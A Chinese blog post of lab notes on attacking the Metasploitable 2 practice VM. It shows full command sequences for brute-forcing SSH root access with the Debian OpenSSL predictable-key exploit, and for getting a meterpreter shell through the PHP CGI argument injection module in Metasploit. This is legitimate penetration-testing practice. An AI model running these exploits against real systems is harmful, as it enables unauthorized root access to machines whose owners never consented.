metasploitable 2 c4rp3nt3r 測試筆記
最近metasploit發佈了metasploitable 2,作爲一個練習用的linux操作系統. 採用Ubuntu 8.04的OS,搭配各種漏洞,正好滿足了廣大窮屌絲日益增長的裝X和意淫需求.
下載地址: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
metasploit官方的用戶指南
詳見: https://community.rapid7.com/docs/DOC-1875
孤陋寡聞的我原來沒有玩過這麼高級的東西,就下載回來測試了下一把.
操起nmap 和 nessus一陣狂掃發現N多服務N多高危漏洞.
![]( "nessus scan report")
metasploitable就好比一道練習題,做題當然要撿自己掌握不好的來做,否則失去做題的意義了.很多一擊必中的漏洞和後門都沒多大意思,我們對結果不太確定的東西感興趣.先看看22端口掃描出的漏洞.
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166
![]( "nessus-ssh-vuln")
既然是metasploitable那麼就請metasploit出馬吧
搜一下有木有exp
msf > search cve:2008-0166
msf >
尼瑪,這個真木有,估計metasploit pro應該有這個exp吧,窮屌絲哪有錢買那個,誰有破解的,真心求.
我擦,窮屌絲只好搜搜exploit-db了.本地搜索的話可以先svn update一下.
1 |
root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl |
3 |
--------------------------------------------------------------------------- ------------------------- |
4 |
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b) /multiple/dos/146.c |
5 |
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c) /linux/remote/764.c |
6 |
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit /multiple/dos/4773.pl |
7 |
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit /multiple/remote/5622.txt |
8 |
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby) /multiple/remote/5632.rb |
9 |
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python) /linux/remote/5720.py |
10 |
OpenSSL <= 0.9.8k /multiple/dos/8720.c |
11 |
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit /multiple/dos/8873.c |
12 |
OpenSSL remote DoS /linux/dos/12334.c |
13 |
OpenSSL ASN1 BIO Memory Corruption Vulnerability /multiple/dos/18756.txt |
挑一個python的exp,打開瞧瞧,就會發現貼心的用法
1 |
# Autor: hitz - WarCat team (warcat.no-ip.org) |
2 |
# Collaborator: pretoriano |
6 |
# 2. Extract it to a directory |
8 |
# 3. Execute the python script |
9 |
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5 |
10 |
# - execute: python exploit.py (without parameters) to display the help |
11 |
# - if the key is found, the script shows something like that: |
12 |
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121 |
13 |
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240 |
好吧開幹
4 |
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2 |
6 |
root@bt:~/Desktop# python 5720.py |
8 |
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org |
9 |
./exploit.py <dir> <host> <user> [[port] [threads]] |
10 |
<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash |
11 |
<host>: The victim host |
12 |
<user>: The user of the victim host |
13 |
[port]: The SSH port of the victim host (default 22) |
14 |
[threads]: Number of threads (default 4) Too big numer is bad |
15 |
root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root |
等到花兒謝了之後,發現成功了
![]( "exploit-ssh-success")
趕緊試一試.
1 |
root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103 |
2 |
Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100 |
3 |
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 |
5 |
The programs included with the Ubuntu system are free software; |
6 |
the exact distribution terms for each program are described in the |
7 |
individual files in /usr/share/doc/*/copyright. |
9 |
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by |
12 |
To access official Ubuntu documentation, please visit: |
17 |
root@metasploitable:~# id |
18 |
uid=0(root) gid=0(root) groups=0(root) |
19 |
root@metasploitable:~# |
![]( "ssh-login-success")
我勒個去,真登錄進去了,這尼瑪太也容易了.
繼續看看吧,別人公佈的利用方法咱就不看了.
看看web目錄有些什麼菜吧.有一個存在漏洞的的phpMyAdmin.還有一套wiki程序以及一些專門練習web漏洞用的Mutillidae和DVWA.
![]( "metasploitable-index-page")
練習用的太簡單了咱就不玩了,TWiki也不好玩,mysql的密碼前面nessus已經掃描出來了,web程序也不好玩.掃掃目錄看有什麼東西沒有.
找一個輕量級的perl程序隨便掃掃先.結果如下
1 |
++++++++++++++++++++++++++++++++++++ |
8 |
++++++++++++++++++++++++++++++++++++ |
看看phpinfo.php吧.某國際***說除了phpinfo.php啥都沒有,其實有時候一個phpinfo.php足夠拿個shell了.
看了下是cgi方式運行的php,訪問
![]( "php-cgi-arg-injection-vuln")
尼瑪這不是那個誰嗎,PHP CGI Argument Injection 漏洞啊
這次再請出metasploit出場,你是主角啊,給點力行不?
1 |
msf > search cve:2012-1823 |
6 |
Name Disclosure Date Rank Description |
7 |
---- --------------- ---- ----------- |
8 |
exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent PHP CGI Argument Injection |
這次真有了,好吧metasploit時間到了
1 |
msf exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection |
2 |
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103 |
4 |
msf exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php |
5 |
TARGETURI => /phpinfo.php |
6 |
msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp |
7 |
PAYLOAD => php/meterpreter/bind_tcp |
8 |
msf exploit(php_cgi_arg_injection) > exploit |
10 |
[*] Started bind handler |
11 |
[*] Sending stage (39217 bytes) to 192.168.1.103 |
12 |
[*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800 |
17 |
Server username: www-data (33) |
![]( "exploit-php-cgi-arg-injection")
好吧用metasploit成功了一次.總算沒白叫metasploitable.
之後又測試了裏面的web漏洞,沒什麼意思就不寫了.啥時候國人搞一個類似的系統呢?放上國產的cms,別放那麼多溢出和弱口令,搞個遊戲或者競賽其實挺好玩的.
